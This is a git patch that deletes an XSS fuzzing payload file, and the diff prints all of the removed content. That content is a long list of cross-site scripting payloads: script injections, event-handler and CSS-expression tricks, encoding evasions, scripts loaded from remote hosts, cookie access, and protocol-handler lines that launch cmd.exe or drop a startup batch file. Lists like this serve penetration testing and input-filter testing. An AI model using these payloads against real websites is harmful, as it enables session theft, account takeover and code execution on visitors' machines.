From 8a783e85ad4cada33043e7bc3fac8f6d2ddf75e8 Mon Sep 17 00:00:00 2001 From: InformationSecurity <1241112575@qq.com> Date: Tue, 26 Jul 2016 22:22:18 +0800 Subject: [PATCH] Delete detect.txt --- payloads/XSS/detect.txt | 227 ---------------------------------------- 1 file changed, 227 deletions(-) delete mode 100644 payloads/XSS/detect.txt diff --git a/payloads/XSS/detect.txt b/payloads/XSS/detect.txt deleted file mode 100644 index d759f11..0000000 --- a/payloads/XSS/detect.txt +++ /dev/null @@ -1,227 +0,0 @@ - - - -'> -`> -> - -< ->"' -'';!--"=&{()} -*/a=eval;b=alert;a(b(/e/.source));/* -'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' - -%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// -
MOVE MOUSE OVER THIS AREA - - -perl -e 'print "alert("XSS")";' > out -
Div Body
-alert(1) -A=alert;A(1) -+alert(0)+ -';//%0da=eval;b=alert;a(b(9));// -a=1;a=eval;b=alert;a(b(11));// -'};a=eval;b=alert;a(b(13));// -1};a=eval;b=alert;a(b(14));// -'];a=eval;b=alert;a(b(15));// -1];a=eval;b=alert;a(b(17));// -1;a=eval;b=alert;a(b(/c/.source)); -xyz onerror=alert(6); -> XSS | Replacive Fuzzers ->>This is a comment line to be changed in the future - - -style=color: expression(alert(0));" a=" -vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< -width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) - -
- - - - - - - - - - - -exp/* - - - -
  • XSS - - - - - - - - - - - -firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" -res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 ->%22%27> -> XSS | Replacive Fuzzers ->>This is a comment line to be changed in the future -(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) - -">'>=&{}");}alert(6);function xss(){// -';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");} -'';!--"=&{(alert(1))} - -
    MOVE MOUSE OVER THIS AREA -'';!--"=&{()} - - - - - - -PT SRC="http://ha.ckers.org/xss.js"> - - - - - -">", - - - - - - -/XSS STYLE=xss:expression(alert('XSS'))> -XSS STYLE=xss:e/**/xpression(alert('XSS'))> -XSS-STYLE=xss:e/**/xpression(alert('XSS'))> -XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> -"> -]]> - - -xss - -alert(document.cookie); -aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" -firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" -navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) -res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 - - - -httP://aa"> -httP://aa'> -httP://aa -<SCRIPT>alert('XSS')</SCRIPT> -<SCRIPT SRC=http://testsite.com/xss.js></SCRIPT> -<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> -<BASE HREF="javascript:alert('XSS');//"> -<BGSOUND SRC="javascript:alert('XSS');"> -<BODY BACKGROUND="javascript:alert('XSS');"> -<BODY ONLOAD=alert('XSS')> -<DIV STYLE="background-image: url(javascript:alert('XSS'))"> -<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> -<DIV STYLE="width: expression(alert('XSS'));"> -<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> -<IFRAME SRC="javascript:alert('XSS');"></IFRAME> -<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> -<IMG SRC="javascript:alert('XSS');"> -<IMG SRC=javascript:alert('XSS')> -<IMG DYNSRC="javascript:alert('XSS');"> -<IMG LOWSRC="javascript:alert('XSS');"> -<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> -<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS -<IMG SRC='vbscript:msgbox("XSS")'> -<LAYER SRC="http://testsite.com/scriptlet.html"></LAYER> -<IMG SRC="livescript:[code]"> -%BCscript%BEalert(%A2XSS%A2)%BC/script%BE -<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> -<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> -<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> -<IMG SRC="mocha:[code]"> -<STYLE TYPE="text/javascript">alert('XSS');</STYLE> -<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> -<XSS STYLE="xss:expression(alert('XSS'))"> -<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> -<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> -<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> -<LINK REL="stylesheet" HREF="http://testsite.com/xss.css"> -<STYLE>@import'http://testsite.com/xss.css';</STYLE> -<META HTTP-EQUIV="Link" Content="<http://testsite.com/xss.css>; REL=stylesheet"> -<STYLE>BODY{-moz-binding:url("http://testsite.com/xssmoz.xml#xss")}</STYLE> -<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> -<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> -<HTML xmlns:xss> <?import namespace="xss" implementation="http://testsite.com/xss.htc"> <xss:xss>XSS</xss:xss> </HTML> -<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> -<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> -<XML SRC="http://testsite.com/xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> -<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> -<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> -<XSS STYLE="behavior: url(http://testsite.com/xss.htc);"> -<SCRIPT SRC="http://testsite.com/xss.jpg"></SCRIPT> -<BR SIZE="&{alert('XSS')}"> -<IMG SRC=JaVaScRiPt:alert('XSS')> -<IMG SRC=javascript:alert(&quot;XSS&quot;)> -<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> -</TITLE><SCRIPT>alert("XSS");</SCRIPT> -<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> -<IMG SRC="jav ascript:alert('XSS');"> -<IMG SRC="jav&#x09;ascript:alert('XSS');"> -<IMG SRC="jav&#x0A;ascript:alert('XSS');"> -<IMG SRC="jav&#x0D;ascript:alert('XSS');"> -<IMG SRC = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > -perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out -perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out -<IMG SRC=" &#14; javascript:alert('XSS');"> -<SCRIPT/XSS SRC="http://testsite.com/xss.js"></SCRIPT> -<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> -<SCRIPT SRC=http://testsite.com/xss.js -<SCRIPT SRC=//testsite.com/.j> -<IMG SRC="javascript:alert('XSS')" -<IFRAME SRC=http://testsite.com/scriptlet.html < -<<SCRIPT>alert("XSS");//<</SCRIPT> -<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> -<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT> -<P STYLE="behavior:url('#default#time2')" onEnd="alert('XSS')"> -<SCRIPT a=">" SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT ="blah" SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT a="blah" '' SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT "a='>'" SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT a=`>` SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://testsite.com/xss.js"></SCRIPT> -<SCRIPT a=">'>" SRC="http://testsite.com/xss.js"></SCRIPT>